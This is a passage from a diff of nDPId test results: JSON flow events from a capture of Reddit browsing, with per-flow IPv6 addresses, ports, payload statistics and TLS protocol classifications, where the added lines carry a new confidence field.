-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.YouTube","breed":"Fun","category":"Media"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}}
+00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00718{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00714{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00714{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00714{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00714{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
+00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}}
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}}
